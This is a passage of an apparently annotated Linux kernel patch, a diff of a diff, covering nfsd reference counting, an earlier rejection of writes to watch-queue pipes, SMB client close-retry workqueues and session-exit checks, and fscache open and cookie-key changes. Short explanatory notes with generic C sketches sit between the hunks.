+-	spin_unlock(&nn->client_lock);
++	drop_client(clp);
+ }
+ 
+ static const struct nfsd4_callback_ops nfsd4_cb_recall_any_ops = {
+@@ -6231,7 +6228,7 @@ deleg_reaper(struct nfsd_net *nn)
+ 		list_add(&clp->cl_ra_cblist, &cblist);
+ 
+ 		/* release in nfsd4_cb_recall_any_release */
+-		atomic_inc(&clp->cl_rpc_users);
++		kref_get(&clp->cl_nfsdfs.cl_ref);
+ 		set_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
+ 		clp->cl_ra_time = ktime_get_boottime_seconds();
+ 	}
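
The nfsd hunks swap the reference that pins the client across the recall-any callback: instead of bumping cl_rpc_users and releasing it with put_client_renew_locked() under nn->client_lock, the code now takes the client's nfsdfs kref and drops it with drop_client(), so the release path above needs no per-net lock at all. The underlying kref idiom, sketched generically (not the nfsd types):

    #include <linux/kref.h>
    #include <linux/slab.h>

    struct obj {
            struct kref ref;
    };

    static void obj_release(struct kref *ref)
    {
            kfree(container_of(ref, struct obj, ref));
    }

    /* Pin the object before handing it to an async callback... */
    static void queue_async_use(struct obj *o)
    {
            kref_get(&o->ref);
    }

    /* ...and drop the pin when the callback is done; the last put runs
     * the destructor, with no external lock needed for the count. */
    static void async_done(struct obj *o)
    {
            kref_put(&o->ref, obj_release);
    }
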
+diff --git a/fs/pipe.c b/fs/pipe.c
+index 9873a6030df56..aa8e6ffe1cb58 100644
+--- a/fs/pipe.c
++++ b/fs/pipe.c
+@@ -424,6 +424,18 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 	bool was_empty = false;
+ 	bool wake_next_writer = false;
+ 
++	/*
++	 * Reject writing to watch queue pipes before the point where we lock
++	 * the pipe.
++	 * Otherwise, lockdep would be unhappy if the caller already has another
++	 * pipe locked.
++	 * If we had to support locking a normal pipe and a notification pipe at
++	 * the same time, we could set up lockdep annotations for that, but
++	 * since we don't actually need that, it's simpler to just bail here.
++	 */
++	if (pipe_has_watch_queue(pipe))
++		return -EXDEV;
++
+ 	/* Null write succeeds. */
+ 	if (unlikely(total_len == 0))
+ 		return 0;
+@@ -436,11 +448,6 @@ pipe_write(struct kiocb *iocb, struct iov_iter *from)
+ 		goto out;
+ 	}
+ 
+-	if (pipe_has_watch_queue(pipe)) {
+-		ret = -EXDEV;
+-		goto out;
+-	}
+-
+ 	/*
+ 	 * If it wasn't empty we try to merge new data into
+ 	 * the last buffer.
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 86fe433b1d324..f4ad343b06c1f 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -370,6 +370,7 @@ smb2_close_cached_fid(struct kref *ref)
+ {
+ 	struct cached_fid *cfid = container_of(ref, struct cached_fid,
+ 					       refcount);
++	int rc;
+ 
+ 	spin_lock(&cfid->cfids->cfid_list_lock);
+ 	if (cfid->on_list) {
+@@ -383,9 +384,10 @@ smb2_close_cached_fid(struct kref *ref)
+ 	cfid->dentry = NULL;
+ 
+ 	if (cfid->is_open) {
+-		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++		rc = SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
+-		atomic_dec(&cfid->tcon->num_remote_opens);
++		if (rc != -EBUSY && rc != -EAGAIN)
++			atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index 5df8d93233376..a2afdf9c5f80b 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -186,6 +186,8 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			if (cifs_ses_exiting(ses))
++				continue;
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+@@ -566,6 +568,8 @@ static ssize_t cifs_stats_proc_write(struct file *file,
+ 			}
+ #endif /* CONFIG_CIFS_STATS2 */
+ 			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++				if (cifs_ses_exiting(ses))
++					continue;
+ 				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 					atomic_set(&tcon->num_smbs_sent, 0);
+ 					spin_lock(&tcon->stat_lock);
+@@ -644,6 +648,8 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			if (cifs_ses_exiting(ses))
++				continue;
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 				i++;
+ 				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 7286a56aebfa9..0a79771c8f33b 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -154,6 +154,7 @@ struct workqueue_struct	*decrypt_wq;
+ struct workqueue_struct	*fileinfo_put_wq;
+ struct workqueue_struct	*cifsoplockd_wq;
+ struct workqueue_struct	*deferredclose_wq;
++struct workqueue_struct	*serverclose_wq;
+ __u32 cifs_lock_secret;
+ 
+ /*
+@@ -1866,6 +1867,13 @@ init_cifs(void)
+ 		goto out_destroy_cifsoplockd_wq;
+ 	}
+ 
++	serverclose_wq = alloc_workqueue("serverclose",
++					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!serverclose_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_serverclose_wq;
++	}
++
+ 	rc = cifs_init_inodecache();
+ 	if (rc)
+ 		goto out_destroy_deferredclose_wq;
+@@ -1940,6 +1948,8 @@ init_cifs(void)
+ 	destroy_workqueue(decrypt_wq);
+ out_destroy_cifsiod_wq:
+ 	destroy_workqueue(cifsiod_wq);
++out_destroy_serverclose_wq:
++	destroy_workqueue(serverclose_wq);
+ out_clean_proc:
+ 	cifs_proc_clean();
+ 	return rc;
+@@ -1969,6 +1979,7 @@ exit_cifs(void)
+ 	destroy_workqueue(cifsoplockd_wq);
+ 	destroy_workqueue(decrypt_wq);
+ 	destroy_workqueue(fileinfo_put_wq);
++	destroy_workqueue(serverclose_wq);
+ 	destroy_workqueue(cifsiod_wq);
+ 	cifs_proc_clean();
+ }
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 58bb54994e22a..e5a72f9c793ef 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -389,10 +389,10 @@ struct smb_version_operations {
+ 	/* set fid protocol-specific info */
+ 	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
+ 	/* close a file */
+-	void (*close)(const unsigned int, struct cifs_tcon *,
++	int (*close)(const unsigned int, struct cifs_tcon *,
+ 		      struct cifs_fid *);
+ 	/* close a file, returning file attributes and timestamps */
+-	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
++	int (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
+ 		      struct cifsFileInfo *pfile_info);
+ 	/* send a flush request to the server */
+ 	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
+@@ -1359,6 +1359,7 @@ struct cifsFileInfo {
+ 	bool invalidHandle:1;	/* file closed via session abend */
+ 	bool swapfile:1;
+ 	bool oplock_break_cancelled:1;
++	bool offload:1; /* offload final part of _put to a wq */
+ 	unsigned int oplock_epoch; /* epoch from the lease break */
+ 	__u32 oplock_level; /* oplock/lease level from the lease break */
+ 	int count;
+@@ -1367,6 +1368,7 @@ struct cifsFileInfo {
+ 	struct cifs_search_info srch_inf;
+ 	struct work_struct oplock_break; /* work for oplock breaks */
+ 	struct work_struct put; /* work for the final part of _put */
++	struct work_struct serverclose; /* work for serverclose */
+ 	struct delayed_work deferred;
+ 	bool deferred_close_scheduled; /* Flag to indicate close is scheduled */
+ 	char *symlink_target;
+@@ -2005,6 +2007,7 @@ extern struct workqueue_struct *decrypt_wq;
+ extern struct workqueue_struct *fileinfo_put_wq;
+ extern struct workqueue_struct *cifsoplockd_wq;
+ extern struct workqueue_struct *deferredclose_wq;
++extern struct workqueue_struct *serverclose_wq;
+ extern __u32 cifs_lock_secret;
+ 
+ extern mempool_t *cifs_mid_poolp;
+@@ -2175,4 +2178,14 @@ static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
+ 	return sg;
+ }
+ 
++static inline bool cifs_ses_exiting(struct cifs_ses *ses)
++{
++	bool ret;
++
++	spin_lock(&ses->ses_lock);
++	ret = ses->ses_status == SES_EXITING;
++	spin_unlock(&ses->ses_lock);
++	return ret;
++}
++
+ #endif	/* _CIFS_GLOB_H */
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 49fdc6dfdcf8d..8c2a784200ec2 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -216,6 +216,8 @@ cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		spin_lock(&ses->chan_lock);
+ 		for (i = 0; i < ses->chan_count; i++) {
+ 			spin_lock(&ses->chans[i].server->srv_lock);
+diff --git a/fs/smb/client/dir.c b/fs/smb/client/dir.c
+index e382b794acbed..863c7bc3db86f 100644
+--- a/fs/smb/client/dir.c
++++ b/fs/smb/client/dir.c
+@@ -180,6 +180,7 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	int disposition;
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	*oplock = 0;
+ 	if (tcon->ses->server->oplocks)
+@@ -191,6 +192,10 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 		return PTR_ERR(full_path);
+ 	}
+ 
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (oflags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ 	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
+ 	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+@@ -267,6 +272,8 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 		desired_access |= GENERIC_READ; /* is this too little? */
+ 	if (OPEN_FMODE(oflags) & FMODE_WRITE)
+ 		desired_access |= GENERIC_WRITE;
++	if (rdwr_for_fscache == 1)
++		desired_access |= GENERIC_READ;
+ 
+ 	disposition = FILE_OVERWRITE_IF;
+ 	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+@@ -295,6 +302,7 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -308,8 +316,15 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
++		if (rc == -EACCES && rdwr_for_fscache == 1) {
++			desired_access &= ~GENERIC_READ;
++			rdwr_for_fscache = 2;
++			goto retry_open;
++		}
+ 		goto out;
+ 	}
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
+ 
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ 	/*
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 0f3405e0f2e48..d23dfc83de507 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -77,12 +77,12 @@ cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+ 	 */
+ }
+ 
+-static inline int cifs_convert_flags(unsigned int flags)
++static inline int cifs_convert_flags(unsigned int flags, int rdwr_for_fscache)
+ {
+ 	if ((flags & O_ACCMODE) == O_RDONLY)
+ 		return GENERIC_READ;
+ 	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		return GENERIC_WRITE;
++		return rdwr_for_fscache == 1 ? (GENERIC_READ | GENERIC_WRITE) : GENERIC_WRITE;
+ 	else if ((flags & O_ACCMODE) == O_RDWR) {
+ 		/* GENERIC_ALL is too much permission to request
+ 		   can cause unnecessary access denied on create */
+@@ -219,11 +219,16 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	int create_options = CREATE_NOT_DIR;
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	if (!server->ops->open)
+ 		return -ENOSYS;
+ 
+-	desired_access = cifs_convert_flags(f_flags);
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (f_flags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
++	desired_access = cifs_convert_flags(f_flags, rdwr_for_fscache);
+ 
+ /*********************************************************************
+  *  open flag mapping table:
+@@ -260,6 +265,7 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -271,8 +277,16 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc)
++	if (rc) {
++		if (rc == -EACCES && rdwr_for_fscache == 1) {
++			desired_access = cifs_convert_flags(f_flags, 0);
++			rdwr_for_fscache = 2;
++			goto retry_open;
++		}
+ 		return rc;
++	}
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
+ 
+ 	/* TODO: Add support for calling posix query info but with passing in fid */
+ 	if (tcon->unix_ext)
+@@ -316,6 +330,7 @@ cifs_down_write(struct rw_semaphore *sem)
+ }
+ 
+ static void cifsFileInfo_put_work(struct work_struct *work);
++void serverclose_work(struct work_struct *work);
+ 
+ struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+ 				       struct tcon_link *tlink, __u32 oplock,
+@@ -362,6 +377,7 @@ struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+ 	cfile->tlink = cifs_get_tlink(tlink);
+ 	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
+ 	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
++	INIT_WORK(&cfile->serverclose, serverclose_work);
+ 	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
+ 	mutex_init(&cfile->fh_mutex);
+ 	spin_lock_init(&cfile->file_info_lock);
+@@ -453,6 +469,40 @@ static void cifsFileInfo_put_work(struct work_struct *work)
+ 	cifsFileInfo_put_final(cifs_file);
+ }
+ 
++void serverclose_work(struct work_struct *work)
++{
++	struct cifsFileInfo *cifs_file = container_of(work,
++			struct cifsFileInfo, serverclose);
++
++	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
++
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc = 0;
++	int retries = 0;
++	int MAX_RETRIES = 4;
++
++	do {
++		if (server->ops->close_getattr)
++			rc = server->ops->close_getattr(0, tcon, cifs_file);
++		else if (server->ops->close)
++			rc = server->ops->close(0, tcon, &cifs_file->fid);
++
++		if (rc == -EBUSY || rc == -EAGAIN) {
++			retries++;
++			msleep(250);
++		}
++	} while ((rc == -EBUSY || rc == -EAGAIN) && (retries < MAX_RETRIES)
++	);
++
++	if (retries == MAX_RETRIES)
++		pr_warn("Serverclose failed %d times, giving up\n", MAX_RETRIES);
++
++	if (cifs_file->offload)
++		queue_work(fileinfo_put_wq, &cifs_file->put);
++	else
++		cifsFileInfo_put_final(cifs_file);
++}
++
+ /**
+  * cifsFileInfo_put - release a reference of file priv data
+  *
+@@ -493,10 +543,13 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 	struct cifs_fid fid = {};
+ 	struct cifs_pending_open open;
+ 	bool oplock_break_cancelled;
++	bool serverclose_offloaded = false;
+ 
+ 	spin_lock(&tcon->open_file_lock);
+ 	spin_lock(&cifsi->open_file_lock);
+ 	spin_lock(&cifs_file->file_info_lock);
++
++	cifs_file->offload = offload;
+ 	if (--cifs_file->count > 0) {
+ 		spin_unlock(&cifs_file->file_info_lock);
+ 		spin_unlock(&cifsi->open_file_lock);
+@@ -538,13 +591,20 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
+ 		struct TCP_Server_Info *server = tcon->ses->server;
+ 		unsigned int xid;
++		int rc = 0;
+ 
+ 		xid = get_xid();
+ 		if (server->ops->close_getattr)
+-			server->ops->close_getattr(xid, tcon, cifs_file);
++			rc = server->ops->close_getattr(xid, tcon, cifs_file);
+ 		else if (server->ops->close)
+-			server->ops->close(xid, tcon, &cifs_file->fid);
++			rc = server->ops->close(xid, tcon, &cifs_file->fid);
+ 		_free_xid(xid);
++
++		if (rc == -EBUSY || rc == -EAGAIN) {
++			// Server close failed, hence offloading it as an async op
++			queue_work(serverclose_wq, &cifs_file->serverclose);
++			serverclose_offloaded = true;
++		}
+ 	}
+ 
+ 	if (oplock_break_cancelled)
+@@ -552,10 +612,15 @@ void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+ 
+ 	cifs_del_pending_open(&open);
+ 
+-	if (offload)
+-		queue_work(fileinfo_put_wq, &cifs_file->put);
+-	else
+-		cifsFileInfo_put_final(cifs_file);
++	// If serverclose has been offloaded to the wq (on failure), it will
++	// handle offloading the put as well. If serverclose was not
++	// offloaded, we need to handle offloading the put here.
++	if (!serverclose_offloaded) {
++		if (offload)
++			queue_work(fileinfo_put_wq, &cifs_file->put);
++		else
++			cifsFileInfo_put_final(cifs_file);
++	}
+ }
+ 
+ int cifs_open(struct inode *inode, struct file *file)
+@@ -705,11 +770,11 @@ int cifs_open(struct inode *inode, struct file *file)
+ use_cache:
+ 	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+ 			   file->f_mode & FMODE_WRITE);
+-	if (file->f_flags & O_DIRECT &&
+-	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
+-	     file->f_flags & O_APPEND))
+-		cifs_invalidate_cache(file_inode(file),
+-				      FSCACHE_INVAL_DIO_WRITE);
++	if (!(file->f_flags & O_DIRECT))
++		goto out;
++	if ((file->f_flags & (O_ACCMODE | O_APPEND)) == O_RDONLY)
++		goto out;
++	cifs_invalidate_cache(file_inode(file), FSCACHE_INVAL_DIO_WRITE);
+ 
+ out:
+ 	free_dentry_path(page);
+@@ -774,6 +839,7 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	int disposition = FILE_OPEN;
+ 	int create_options = CREATE_NOT_DIR;
+ 	struct cifs_open_parms oparms;
++	int rdwr_for_fscache = 0;
+ 
+ 	xid = get_xid();
+ 	mutex_lock(&cfile->fh_mutex);
+@@ -837,7 +903,11 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	}
+ #endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+ 
+-	desired_access = cifs_convert_flags(cfile->f_flags);
++	/* If we're caching, we need to be able to fill in around partial writes. */
++	if (cifs_fscache_enabled(inode) && (cfile->f_flags & O_ACCMODE) == O_WRONLY)
++		rdwr_for_fscache = 1;
++
++	desired_access = cifs_convert_flags(cfile->f_flags, rdwr_for_fscache);
+ 
+ 	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+ 	if (cfile->f_flags & O_SYNC)
+@@ -849,6 +919,7 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
++retry_open:
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
+@@ -874,6 +945,11 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 		/* indicate that we need to relock the file */
+ 		oparms.reconnect = true;
+ 	}
++	if (rc == -EACCES && rdwr_for_fscache == 1) {
++		desired_access = cifs_convert_flags(cfile->f_flags, 0);
++		rdwr_for_fscache = 2;
++		goto retry_open;
++	}
+ 
+ 	if (rc) {
+ 		mutex_unlock(&cfile->fh_mutex);
+@@ -882,6 +958,9 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 		goto reopen_error_exit;
+ 	}
+ 
++	if (rdwr_for_fscache == 2)
++		cifs_invalidate_cache(inode, FSCACHE_INVAL_DIO_WRITE);
++
+ #ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ reopen_success:
+ #endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
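
The dir.c and file.c hunks above all install the same three-state fallback: with fscache active and an O_WRONLY open, the client additionally requests GENERIC_READ so it can read back around partial writes; if the server answers -EACCES it retries with the original mask and marks the local cache for invalidation. Condensed into one hypothetical helper (server_open() and invalidate_local_cache() are stand-ins, not cifs functions):

    #include <errno.h>

    #define GENERIC_READ 0x80000000u  /* SMB access bit, as in the protocol */

    extern int server_open(const char *path, unsigned int access);
    extern void invalidate_local_cache(const char *path);

    /* rdwr_for_fscache: 0 = no read-back wanted, 1 = GENERIC_READ added
     * so the cache can be filled around partial writes, 2 = the server
     * refused the wider mask, so cached contents must be dropped. */
    static int open_with_fscache_fallback(const char *path,
                                          unsigned int base_access,
                                          int cache_enabled, int write_only)
    {
            int rdwr_for_fscache = (cache_enabled && write_only) ? 1 : 0;
            unsigned int access;
            int rc;

    retry_open:
            access = base_access;
            if (rdwr_for_fscache == 1)
                    access |= GENERIC_READ;
            rc = server_open(path, access);
            if (rc == -EACCES && rdwr_for_fscache == 1) {
                    rdwr_for_fscache = 2;           /* retry, narrow mask */
                    goto retry_open;
            }
            if (rc == 0 && rdwr_for_fscache == 2)
                    invalidate_local_cache(path);   /* no read-back possible */
            return rc;
    }
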
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index f64bad513ba6d..6df4ab2a6e5dc 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -12,6 +12,16 @@
+ #include "cifs_fs_sb.h"
+ #include "cifsproto.h"
+ 
++/*
++ * Key for fscache inode.  [!] Contents must match comparisons in cifs_find_inode().
++ */
++struct cifs_fscache_inode_key {
++
++	__le64  uniqueid;	/* server inode number */
++	__le64  createtime;	/* creation time on server */
++	u8	type;		/* S_IFMT file type */
++} __packed;
++
+ static void cifs_fscache_fill_volume_coherency(
+ 	struct cifs_tcon *tcon,
+ 	struct cifs_fscache_volume_coherency_data *cd)
+@@ -97,15 +107,19 @@ void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
+ void cifs_fscache_get_inode_cookie(struct inode *inode)
+ {
+ 	struct cifs_fscache_inode_coherency_data cd;
++	struct cifs_fscache_inode_key key;
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+ 
++	key.uniqueid	= cpu_to_le64(cifsi->uniqueid);
++	key.createtime	= cpu_to_le64(cifsi->createtime);
++	key.type	= (inode->i_mode & S_IFMT) >> 12;
+ 	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
+ 
+ 	cifsi->netfs.cache =
+ 		fscache_acquire_cookie(tcon->fscache, 0,
+-				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
++				       &key, sizeof(key),
+ 				       &cd, sizeof(cd),
+ 				       i_size_read(&cifsi->netfs.inode));
+ 	if (cifsi->netfs.cache)
+diff --git a/fs/smb/client/fscache.h b/fs/smb/client/fscache.h
+index 67b601041f0a3..c691b98b442a6 100644
+--- a/fs/smb/client/fscache.h
++++ b/fs/smb/client/fscache.h
+@@ -108,6 +108,11 @@ static inline void cifs_readpage_to_fscache(struct inode *inode,
+ 		__cifs_readpage_to_fscache(inode, page);
+ }
+ 
++static inline bool cifs_fscache_enabled(struct inode *inode)
++{
++	return fscache_cookie_enabled(cifs_inode_cookie(inode));
++}
++
+ #else /* CONFIG_CIFS_FSCACHE */
+ static inline
+ void cifs_fscache_fill_coherency(struct inode *inode,
+@@ -123,6 +128,7 @@ static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
+ static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
+ static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
+ static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
++static inline bool cifs_fscache_enabled(struct inode *inode) { return false; }
+ 
+ static inline int cifs_fscache_query_occupancy(struct inode *inode,
+ 					       pgoff_t first, unsigned int nr_pages,
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 5343898bac8a6..634f28f0d331e 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -1274,6 +1274,8 @@ cifs_find_inode(struct inode *inode, void *opaque)
+ {
+ 	struct cifs_fattr *fattr = opaque;
+ 
++	/* [!] The compared values must be the same in struct cifs_fscache_inode_key. */
++
+ 	/* don't match inode with different uniqueid */
+ 	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
+ 		return 0;
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+index 41290c12d0bcc..3826f71766086 100644
+--- a/fs/smb/client/misc.c
++++ b/fs/smb/client/misc.c
+@@ -476,6 +476,8 @@ is_valid_oplock_break(char *buffer, struct TCP_Server_Info *srv)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			if (tcon->tid != buf->Tid)
+ 				continue;
+diff --git a/fs/smb/client/smb1ops.c b/fs/smb/client/smb1ops.c
+index 7d1b3fc014d94..d4045925f8577 100644
+--- a/fs/smb/client/smb1ops.c
++++ b/fs/smb/client/smb1ops.c
+@@ -750,11 +750,11 @@ cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+ 	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+ }
+ 
+-static void
++static int
+ cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+ 		struct cifs_fid *fid)
+ {
+-	CIFSSMBClose(xid, tcon, fid->netfid);
++	return CIFSSMBClose(xid, tcon, fid->netfid);
+ }
+ 
+ static int
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 15fa022e79993..8c149cb531d3f 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -622,6 +622,8 @@ smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			spin_lock(&tcon->open_file_lock);
+ 			cifs_stats_inc(
+@@ -697,6 +699,8 @@ smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
+ 	/* look up tcon based on tid & uid */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (cifs_ses_exiting(ses))
++			continue;
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 
+ 			spin_lock(&tcon->open_file_lock);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 34d1262004dfb..2291081653a85 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -1392,14 +1392,14 @@ smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+ 	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
+ }
+ 
+-static void
++static int
+ smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+ 		struct cifs_fid *fid)
+ {
+-	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+ }
+ 
+-static void
++static int
+ smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+ 		   struct cifsFileInfo *cfile)
+ {
